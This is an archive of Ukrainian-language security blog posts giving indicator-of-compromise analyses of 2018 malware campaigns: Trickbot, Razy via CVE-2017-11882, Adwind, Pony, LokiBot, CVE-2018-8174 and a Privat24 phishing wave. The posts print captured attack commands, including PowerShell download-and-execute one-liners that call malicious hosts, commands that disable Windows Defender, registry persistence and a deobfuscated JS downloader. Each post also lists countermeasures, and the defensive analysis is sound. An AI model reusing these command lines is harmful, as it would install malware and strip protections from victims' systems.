Archive | IOC RSS for this section

IOC_doc_rtf11882_190718

Доброго ранку, панове.

Вчора о другій половині дня проходила фішингова розсилка, що містила приманку у вигляді DOCX файлу.

Активація приманки призводила до інфікування системи троянським кодом типу #Razy.

Не дивлячись на те, що усі три частини атаки одразу мали високий рейтинг на VT я хочу розібрати механізм доставки.

Проблеми будуть у тих, хто не оновлює MS Office та не контролює трафік його додатків.

Трохи аналітики

  • доставка у 2 кроки
  • завантаження другого документу – засобами MS word (WINWORD.EXE)
  • завантаження основної частини – засобами редактору формул (EQNEDT32.EXE)
  • не потребує прав Адміністратора
  • payload не кодований (!This program cannot be run in DOS mode.)
  • payload записується у \Program Data\
  • payload здійснює перевірку Public IP

Зразок фішингового листа:

Схема атаки

email attach (DOCX) > document.xml.rels > GET doc (RTF) > 11882 > GET exe > \Program Data\name.exe

крок #1 open docx – document.xml.rels
GET novomet{.} bg/doors/images2/p22.doc

крок #2 open doc (RTF) – 11882
GET novomet{.} bg/doors/images2/p22.exe

крок #3 run exe – check public ip
GET checkip.dyndns{.} org/

Маркери

документ1 – MS Word

SHA-256 a4cdebc96154deb3c3da013d6486c09ebb2a0a508475f5107c8c9a319d70fc15
File name p22.docx
File size 9.88 KB

документ2 – RTF із експлойтом під вразливість редактору формул 11882

SHA-256 f5c35a43c5379d705d3f1575a3859934261a87f27b669cc3ddbf6e601ba00abc
File name p22.doc
File size 15.64 KB

основна частина

SHA-256 d03a4011a87374dbbc7ccf1b8427a95e27f97edae1c1c928da1763343f002708
File name p22.exe > name.exe
File size 280 KB

Мережа

79.124.76.30 novomet{.} bg 80 HEAD /doors/images2/p22.doc Microsoft Office Existence Discovery

79.124.76.30 novomet{.} bg 80 GET /doors/images2/p22.doc Mozilla/4.0

79.124.76.30 novomet{.} bg 80 HEAD /doors/images2/p22.doc Microsoft Office Existence Discovery

79.124.76.30 novomet{.} bg 80 GET /doors/images2/p22.exe Mozilla/4.0

216.146.38.70 checkip.dyndns{.} org GET / HTTP/1.1 n./a

Активність по процесам

Відкриття першого документу спричиняє автоматичне завантаження другого, який є RTF файлом:

Після обробки RTF через експлуатацію 11882 запускається редактор формул, який здійснює завантаження основної частини:

Зверніть увагу, що сайт, який розповсюджує malware містить кілька наборів:

Загалом атака не складна, проте може наробити галасу у тих компаніях, де погано дбають про антивірусний захист та оновлення MS Office.

Контрзаходи

  • Посилення фільтрів пошти
  • Заборона завантаження .exe файлів для непривілейованих користувачів – див. тут
  • Відсікання запитів із нестандартними/пустими/застарілими User Agent на рівні Web Proxy – див. тут
  • Виправлення вразливості 11882 – див. тут
  • Контроль запуску EQNEDT32.EXE
  • Заборона мережевого трафіку для додатків MS Office – див. тут (варіант 1)
  • Контроль створення та запуску нових .exe у C:\Users\ та C:\Program Data\ – див. тут

Будьте уважні та обережні.

VR

Advertisements

IOC_lzh_190718

Усім привіт.

Фіксуємо спроби доставки шкідливого коду через JS скрипти (WSH) у оболонці LZH архівів.

Нічого нового, проте у тих, хто не подбав про контроль/заборону WSH будуть проблеми.

Трохи аналітики:

  • фішинг примітивний, не персоналізований
  • скрипт один, містить два посилання
  • payload не кодований !This program cannot be run in DOS mode.
  • прав Адміністратора не потребує
  • на Office 2007 та 2010 вилітає з помилкою
  • кінцева мета payload поки не встановлена

Схема атаки

email attach lzh (JS) > WSH > GET > \Users\*\AppData\Roaming\Microsoft\Windows\Templates\random.exe

Зверніть увагу на скомпрометований сайт Полтавського обласного управління водних ресурсів, що розповсюджує malware:

Маркери

архів

SHA-256               7343bb8098af8785dfee2e9c3bb2edd109aca75a2f1a2f1890faf25a28f46029
File name            рахунок до оплати зг. дог. 57 ФОП Ушаньов Д.О.zip.lzh
File size 81.59 KB

скрипт

SHA-256               042e079b1acc7bec5076077b8d0df8582ec3b7b675e1777c3a91f3159f71ea24
File name            за оренду рах. №118 ФОП Ушаньов Д.О.xls.js
File size 57.94 KB

payload

SHA-256               3d2777b748e805c0463c0c6d0fef8280ad197bea1dd0a25e30ed71199989a6b9
File name            zakup.exe
File size 223 KB

Деобфускований скрипт:

“var path = wsh.SpecialFolders(“templates”)+”\\”+((Math.random()*999999)+9999|0)+”.exe”;

HTTP.Open(“GET”, “h11p:\poltavavodgosp{.} gov.ua/doc/zakup.exe”, false

{ HTTP.Open(“GET”, “h11p:\avtodoskadoc{.} top/zakupki/peremena.exe”, false)”

 

Мережа

194.0.200.13     poltavavodgosp{.} gov.ua     GET /doc/zakup.exe          Mozilla/4.0
149.129.215.193  avtodoskadoc{.} top          GET/zakupki/peremena.exe    Mozilla/4.0

 

Процеси

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\118.js"
"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\209790.exe"
C:\Windows\splwow64.exe 8192

Контрзаходи

  • Фільтр приєднань на рівні Email – див. тут
  • Заборона завантаження запускних на рівні Proxy – див. тут
  • Заборона створення та зчитування js, jse, vb, vbe та ін скриптових файлів в профілі користувача
  • Заборона створення та запуску нових exe в профілі користувача – див. тут
  • Заборона мережевого трафіку для WSH – див. тут
  • Деактивація WSH – див. тут
  • Фільтрація по User Agent на рівні Proxy

Будьте уважні та обережні.

VR

Приват24 – фішинг

Всім привіт.

Вчора о другій половині дня було зафіксовано хвилю SMS/MMS розсилок, що маскувалися начеб-то під квитанцію по переказу грошей через Приват24

Ось приклад повідомлення:

Якщо людина була досить необережною і переходила за скороченим посиланням, то вона опинялася на фейковій фішинговій сторінці, яка копіює вхід до Приват24.

Погляньте самі: зліва – фейк, праворуч – реальна сторінка Приват24

Фейкова сторінка, яка станом на 16ту годину вже не доступна, збирала облікові дані довірливих жертв:

Нагадую, щоб не стати жертвою шахраїв:

  1. Уважно перевіряти рядок адреси (HTTPS, SSL сертифікат)
  2. Правильність домену та сертифікату
  3. Не вводити облікові дані на підозрілих сторінках
  4. Змінити пароль
  5. Активувати двофакторну авторизацію при кожному вході

Якщо у вас є рахунок в Приват банку, щоб убезпечити ваші фінанси від шахраїв достатньо змінити пароль та активувати двофакторну авторизацію при кожному вході –

після цього, якщо навіть ви необачно введете ваш пароль та номер телефону на фішинговій сторінці, шахраї не отримають доступ до ваших рахунків.

Коротка інструкція як це зробити:

Після цього при кожному вході в Приват24 потрібне буде підтвердження:

Не станьте жертвою.

Будьте уважні та обережні.

VR

malware

Невивчені уроки або логи антивірусних війн

12/07/18 доповідав про наші досягнення у розрізі аналізу шкідливого коду та методів його доставки.

Контент суто технічний. Без прив’язки до конкретних вендорів чи рішень.

Презентацію можна переглянути/взяти тут

Основні тези:

  • Поточні ситуація по атакам (масові)
  • Гучні атаки 2017го (wcry, xdata, eternalpetya, badrabbit…)
  • Не правильні висновки
  • Реагування на інциденти
  • Технічні моменти захисту

Розповів про типові помилки при реагуванні на інциденти та навів приклади дієвих контрзаходів.

Кому зі slideshare не зручно – беріть у вигляді pdf (~4 Mb)

Сподіваюсь, знання стануть у нагоді.

Будьте уважні та обережні.

VR

IOC_Trickbot_040718

Доброго ранку, панове.

 

Вчора отримали на аналіз зразок документу з макросом, активація якого призводить до інфікування #Trickbot.

Обидва джерела досі активні, а основне тіло активно передає інформацію з інфікованих систем.

Є відмінності в способі доставки порівняно із зразком який ми розглядали 11/06.

Рівень загрози, для організацій котрі не блокують макроси, не контролюють PowerShell – високий.

А для тих, хто уважно читає наші поради – низький.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

На що треба звернути увагу:

  • Обидва сервери, що розповсюджують частини malware досі активні
  • Сервер контролю той же самий що і 11/06
  • Передача зібраних даних із User Agent ‘Test’
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається payload рандомні
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Payload завантажуєтеся по захищеному протоколу (Cloudflare)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %tmp% після міграції в %apdata%
  • Спроб закріплення не проводив
  • Натомість намагається відключити Windows Defender
  • Перевірку IP та звернення до Windows Update здійснює основне тіло
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

Email attach (.doc) > vba macro > cmd > powershell > 2 URL > GET bri.ri > %tmp%\%random%.exe

Маркери IOC:

документ

SHA-256    fe0f98f1f0f64564150aa919ed1eed350ec6bec96eba7e08a605124afa6fe6aa
File name   in.doc
File size      80.5 KB

 

Макрос містить 2 URL:

h11p:\meanmuscles{.} com/bri.ri  + active
h11p:\icoindna{.} io/bri.ri      + active

 

основна частина

SHA-256        481fda910780812056f5dbe6a5f534ad114b527f0386933febca56b738300b54
File name   bri.ri  >> %tmp%\%random%.exe !This program cannot be run in DOS mode.
File size      316 KB

 

Відкриває з’єднання із С2

h11p\188.124.167.132:8082 POST /ser0704/hostname.UID     HTTP/1.1    test (UA)

минулого разу:
h11p\188.124.167.132:8082 POST /ser0611/hostname.UID     HTTP/1.1    test (UA)

 

Активність по процесам:

“C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE” /n /dde

C:\Windows\SysWOW64\cmd.exe /c powershell “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”%tmp%\uauuind.exe”);start-process ”%tmp%\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri’‘)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wswjdpihx.bat; start-process ‘%tmp%\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”C:\tmp\uauuind.exe”);start-process ”C:\tmp\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri”)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath C:\tmp\wswjdpihx.bat; start-process ‘C:\tmp\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\cmd.exe  /c “”C:\tmp\wswjdpihx.bat” “

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,’C:\tmp\uauuind.exe’);start-process ‘C:\tmp\uauuind.exe’;}try{dodjq(‘h11p:\icoindna {.}io/bri.ri’)}catch{dodjq(‘h11p:\meanmuscles {.}com/bri.ri’)}

“C:\tmp\uauuind.exe”

C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend

C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend

C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Users\operator\AppData\Roaming\msscsc\uauuind.exe

C:\Windows\system32\svchost.exe

 

Зверніть увагу на рандом макросу:

1st run

——-

cmd /c powershell “‘powershell “”function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,”%tmp%\xpvsvgw.exe”);start-process ”%tmp%\xpvsvgw.exe”;}try{ysga(”h11p:\icoindna{.} io/bri.ri”)}catch{ysga(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\dduuyd.bat; start-process ‘%tmp%\dduuyd.bat’ -windowstyle hidden”

 

2nd run

——-

cmd /c powershell “‘powershell “”function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,”%tmp%\nsxr.exe”);start-process ”%tmp%\nsxr.exe”;}try{bxode(”h11p:\icoindna{.} io/bri.ri”)}catch{bxode(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\ktph.bat; start-process ‘%tmp%\ktph.bat’ -windowstyle hidden”

 

3rd run

——-

cmd /c powershell “‘powershell “”function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,”%tmp%\bixi.exe”);start-process ”%tmp%\bixi.exe”;}try{nnpsd(”h11p:\icoindna{.} io/bri.ri”)}catch{nnpsd(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wjqw.bat; start-process ‘%tmp%\wjqw.bat’ -windowstyle hidden”

 

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

 

Мережеві IOC:

Завантаження основного тіла:

104.27.25.56      icoindna {.}io               GET /bri.ri HTTP/1.1     noUA
68.65.120.85      meanmuscles{.} c0m           GET /bri.ri HTTP/1.1     noUA

Минулого разу:
68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1   noUA

 

Перевірка Public IP:

34.224.244.1      checkip.amazonaws {.}com  GET / HTTP/1.1   Mozilla/5.0

 

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0704/hostname_UID HTTP/1.1 test

 

Трафік інфікованої системи:

[System Process] 49167        83.220.168.209   447   TIME_WAIT                                                                       
svchost.exe        49165        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49170        188.124.167.132 8082 CLOSE_WAIT                                                                             
svchost.exe        49171        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49172        62.140.236.163   80     ESTABLISHED

 

Яку інформацію отримують нападники:

 

POST /ser0704/hostname_UID HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 5007
Cache-Control: no-cache

--Arasfjasu7

Content-Disposition: form-data; name="proclist"

                ***PROCESS LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
...

--Arasfjasu7
Content-Disposition: form-data; name="sysinfo"

                ***SYSTEMINFO***

Host Name - APM11
OS Name - Microsoft Windows 7 ..........................
OS Version - Service Pack 1
OS Architecture - 64-bit
Product Type - Workstation
Build Type - Multiprocessor Free
Registered Owner - operator
Total Physical Memory - 2371 Mb
Available Physical Memory - 2371 Mb

                /c ipconfig /all

                /c net view /all

                /c net view /all /domain

                /c nltest /domain_trusts

                /c nltest /domain_trusts /all_trusts

--Arasfjasu7--
HTTP/1.1 200 OK
server: Cowboy
date: Wed, 04 Jul 2018 18:34:28 GMT
content-length: 3
Content-Type: text/plain
- - - - - - - - - - - - - - - - - - - 

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування на Proxy вихідних з’єднань без User Agent та з UA ‘test’
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_digest_0618

Усім привіт.

Через брак часу та велику кількість зразків надсилаю стислий дайджест того, що присилали наприкінці червня:

 

140618 

#LokiBot #lokibot

SHA-256               7df5d234ba9b5de40e8dae695471f2a0362de10177e3518eb7f9e8c172b47643
File name            PAYMENT SWIFT PDF.iso
File size 696 KB


SHA-256               1800b88ea906961b4ecfd374756cb2c7f0273c6048c04497e315224484cf659e
File name            PAYMENT SWIFT PDF.exe
File size 636 KB

 

h11p://ponsse{.} site/nzube/fre.php

104.28.26.87       ponsse{.} site     POST /nzube/fre.php HTTP/1.0 Mozilla/4.08 (Charon; Inferno)  

 

– – – – – – – – – – –

150618

#js #grandcrab

SHA-256               85838b0cbd2beac5e91b24afbf7a36156b2270bc0c874b6377541740b74a9851
File name            20188946_894679.jpg.zip
File size 21.92 KB

SHA-256               1f26017ef432aee644400e4854e54ff330c797ea8eb79190368fed9cf630377b
File name            e233d4ac26fee5ff56a6536d0db7373217b4c4a7
File size 21.78 KB

SHA-256               eb371764b422e9384e3fb8cbb12112e64666c362758c62bcabbd9f17c7d94341
File name            crabin.exe
File size 207.51 KB

 

h11p://92.63.197{.} 60/crabin.exe?agQefX

92.63.197.60       92.63.197.60       GET /crabin.exe?agQefX HTTP/1.1                            80           HTTP      133

66.171.248.178  carder{.} bit        GET / HTTP/1.1 Mozilla/5.0

217.156.87.2       carder{.} bit        POST /eeb?eyge=ies HTTP/1.1  (application/x-www-form-urlencoded)    Mozilla/5.0

 

#Trickbot

SHA-256               5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name            75812277127A00113A.doc
File size 69 KB

 

macro > cmd > powershell > GET

 

h11p://onetimewonders{.} com/no.bin (!)

h11p://nepalhiking{.} com/no.bin (404)

 

SHA-256               503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name            no.bin   !This program cannot be run in DOS mode.
File size 338 KB

 

h11p\188.124.167.132:8082/ser0611/

 

– – – – – – – – – – –

190618

 

#adwind

SHA-256               2a6ea5647c951659854df5bc3437462294815da880872cc93e96fc01cccd85e4
File name            ORDER SAMPLE.jar
File size 479.42 KB

 

javaw.exe  197.211.59.160  pmanlog.ddns{.} net

 

proc

"C:\Program Files\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\operator\Desktop\adwind1906.jar"
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
"C:\Program Files\Java\jre1.8.0_171\bin\java.exe" -jar C:\tmp\_0.32649732458480233098419347231064428.class
cmd.exe /C cscript.exe C:\tmp\Retrive6508158100243133376.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive3329749612520250823.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
cmd.exe /C cscript.exe C:\tmp\Retrive6611168625816267695.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive35953365366553471.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v extjXQeGNff /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\RmAnqeogmJS\ZQaAquQZKoS.tUCacg\"" /f
attrib +h "C:\Users\operator\RmAnqeogmJS\*.*"
attrib +h "C:\Users\operator\RmAnqeogmJS"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\RmAnqeogmJS\ZQaAquQZKoS.tUCacg
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.64094332285124526171507674142480917.class
cmd.exe /C cscript.exe C:\tmp\Retrive4167831113503291950.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive4003874893192164925.vbs
taskkill /IM UserAccountControlSettings.exe /T /F
cmd.exe /c regedit.exe /s C:\tmp\UjxCMXPFhx4211656766753692948.reg
taskkill /IM Taskmgr.exe /T /F
WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
taskkill /IM PSUAMain.exe /T /F

 

comp

java.exe               1964       TCP        127.0.0.1              50131    127.0.0.1              7777       SYN_SENT

javaw.exe           2772       TCP        10.0.2.15              50102    185.208.211.142                3382       ESTABLISHED

 

#pony (fareit)

SHA-256               c0c4ad871ffe0231961fb2d77ee575c07e4ade470b0d6c84faa7f92ba511ee64
File name            decoded.gz
File size 188.51 KB



SHA-256               5dda41fb0abc6528d80995aedb47c0b59fc6467e7307bbdc75d097aef50fcd21
File name            deed.exe
File size 672 KB

 

185.6.242.251     hosedoin{.} ml   POST /fiv/roks/gate.php HTTP/1.0            Mozilla/4.0

 

– – – – – – – – – – –

200618

#adwind #jar

 

proc

—-

"C:\Program Files\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\operator\Desktop\adwind20.jar"
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Program Files\Java\jre1.8.0_171\bin\java.exe" -jar C:\tmp\_0.54780904655995994375189407378187035.class
cmd.exe /C cscript.exe C:\tmp\Retrive6543292869224297367.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive4922912961062946918.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
cmd.exe /C cscript.exe C:\tmp\Retrive2680843125772440624.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive8763095501247174336.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ZllOQijdfpg /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\VGyRmlBYozs\CFiYFpKudNh.vaZoLR\"" /f
attrib +h "C:\Users\operator\VGyRmlBYozs\*.*"
attrib +h "C:\Users\operator\VGyRmlBYozs"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\VGyRmlBYozs\CFiYFpKudNh.vaZoLR
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.7762377356869443373969133677298847.class
cmd.exe /C cscript.exe C:\tmp\Retrive5882107392697143603.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive1289986287422620902.vbs
taskkill /IM UserAccountControlSettings.exe /T /F
cmd.exe /c regedit.exe /s C:\tmp\DpVePFPaGi2225327046919394054.reg
taskkill /IM Taskmgr.exe /T /F

 

comp

—-

java.exe               3740       TCP        127.0.0.1              50177    127.0.0.1              7777       SYN_SENT

javaw.exe           3136       TCP        10.0.2.15              50176    185.208.211.138                4573       SYN_SENT

 

#pony #fareit

SHA-256               b3468cc1949f8686bd2bc8bda351dc4b31a45f9fcf6c2ea27279421c4465c431
File name            HSBC COPY.docx - clean
File size 76.05 KB


SHA-256               64fd95c4c13fadee7b5fbbe946f0bd66cce07a5a6488c2bc95faefb0098aa97d
File name            PAYMENTCOPY_PDF.exe
File size 50.55 MB

 

h11p://cellimark{.} com/yangzhouming/coreserver/gate.php

h11p://cellimark{.} com/yangzhouming/coreserver/shit.exe  – 404

 

103.63.2.238       cellimark{.} com                POST /yangzhouming/coreserver/gate.php HTTP/1.0       Mozilla/4.0

103.63.2.238       cellimark{.} com                GET /yangzhouming/coreserver/shit.exe HTTP/1.0            Mozilla/4.0                 – 404

– – – – – – – – – – –

Контрзаходи незмінні.

Хто забув чи не знав – дивіться попередні звіти по цим сімействам:

 

#LokiBot              https://radetskiy.wordpress.com/?s=lokibot

#TrickBot             https://radetskiy.wordpress.com/?s=trickbot

#Adwind              https://radetskiy.wordpress.com/?s=adwind

#Pony                   https://radetskiy.wordpress.com/?s=pony

 

Вдалого дня.

Будьте уважні та обережні!

VR

IOC_18-8174_180618

Доброго ранку, панове.

Відстежуємо способи доставки шкідливого коду через вразливість Internet Explorer.

#CVE-2018-8174 призводить до виконання довільного коду через обробку VBS в коді сторінки.

Рівень загрози, для організацій котрі застосовують не оновлений IE в якості основного – високий.

А для тих, хто уважно читає наші поради, контролює powershell та створення нових exe – низький.

Хочемо звернути вашу увагу на цей випадок, оскільки до цього левова частка зразків запускалися через активацію приманки користувачем.

В даному випадку переходу за посиланням достатньо. Максимум – IE запитає користувача чи активувати ActiveX компоненти.

Ми весь час розбирали різні варіанти обгорток що проходять через фішинг.

Разом із тим радимо не забувати про своєчасне оновлення бравзерів та застосування URL фільтрації і фільтрації мережевих експлойтів (Network / Host IPS.)

На що треба звернути увагу:

  • (!) Сервер з експлойтом та проміжним dropper`ом досі активний
  • (!) Станом на 19-те число знову достпні обидва payload
  • (!) Вразливість дозволяє ескалацію привілеїв із обходом UAC
  • Попередній пункт означає, що все, що затягує debug запускається вже від рівня System
  • В цьому випадку проміжний dropper записується у C:\Windows\Temp (по замовчуванню не доступна для звичайного користувача)
  • Весь процес інфікування займає 1-2 хв
  • Активація експлоту приводить до обробки hta файлу, який передає інструкції на powershell (далі усе стандартно)
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані в hta (not random)
  • Dropper та Payload не кодовані (!This program cannot be run in DOS mode.)
  • Зразок не зачищає за собою файли у C:\Windows\Temp
  • Прав Адміністратора не потребує, проте отримує їх при виконанні

І так, проблеми будуть у тих, хто:

  • Використовує не оновлений Internet Explorer (більше 50% організацій)
  • Не заборонили завантаження через powershell та mshta (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

 Схема атаки:

URL > unpatched IE > .html (vbs) > exploit > 
mshta > powershell > GET debug.exe > C:\Windows\temp\debug.exe

Маркери IOC:

SHA-256        7844b3992af7820a8818bf02d8578bcfe0e745712c90b4e52471fd48a595b9e9
File name   3.html
File size      10.1 KB
SHA-256        e484cfd79e8041ad63df663f765e21facdc835df3460c99016ae44c12760b415
File name   wm.hta
File size      316 B

SHA-256 b9215c70ef59ce882f7415e698c5a383273b76a8fc599cb73ea15f33b0315142
File name 1.exe
File size 304.59 KB
SHA-256 82282f5c39347adadbaddce72da905c2beae1a2b68facc8dc22cf6c3485de604
File name 2.exe
File size 84 KB

Активність по процесам:

"C:\Program Files\Internet Explorer\iexplore.exe" >>        111.73.46{.} 110:2233        GET /3.html

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:144385 /prefetch:2

C:\Windows\SysWOW64\mshta.exe h11p://111.73.46{.} 110:2233/wm.hta

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

-windowstyle hidden (new-object System.Net.WebClient).DownloadFile('h11p://111.73.46{.} 110:2233/debug.exe', 'c:/windows/temp/debug.exe'); c:/windows/temp/debug.exe

"C:\windows\temp\debug.exe"

C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\windows\temp\debug.exe > nul

 Мережеві IOC:

Сторінка яка містить експлойт:

111.73.46{.} 110:2233        GET /3.html HTTP/1.1  Mozilla/5.0  – обробляється IE

Hta файл:

111.73.46{.} 110:2233        GET /wm.hta HTTP/1.1 Mozilla/4.0 – обробляється mshta

Проміжний dropper:

111.73.46{.} 110:2233        GET /debug.exe HTTP/1.1             – завантажується через PowerShell

Payload – обидва доступні!:

111.73.46.110:2233             GET /1.exe HTTP/1.1    Mozilla/4.0  – завантажується через debug.exe

111.73.46.110:2233             GET /2.exe HTTP/1.1    Mozilla/4.0  – завантажується через debug.exe

 Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із вказаним URL
  • Застосування шлюзів очистки web трафіку та IPS/IDS або HIPS (ENS 10.6)

Зверніть увагу на ефективність McAfee Web Gateway:

#1 Блок по фільтру геолокації

#2 Блок по репутації

#3 Блок по сигнатурі файлу

#4 Блок по CVE вразливості

Отже, правильно налаштований Web Gateway зробив 4 блоки. Дуже хороший результат.

Спрацювання ENS на вміст вебсторінки:

  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

P.S.

Перевірити, чи вразливий ваш IE до цього екслойту можна за допомогою PoC:

https://github.com/smgorelik/Windows-RCE-exploits/tree/master/Web/VBScript

Про використання данної вразливості популярними exploit-kit читайте тут:

https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174.html

Детальний технічний аналіз самої вразливості тут:

http://blogs.360.cn/blog/cve-2018-8174-en/

Будьте уважні та обережні!

Очікуйте окрему статтю про ефективність модулів ENS 10.6

VR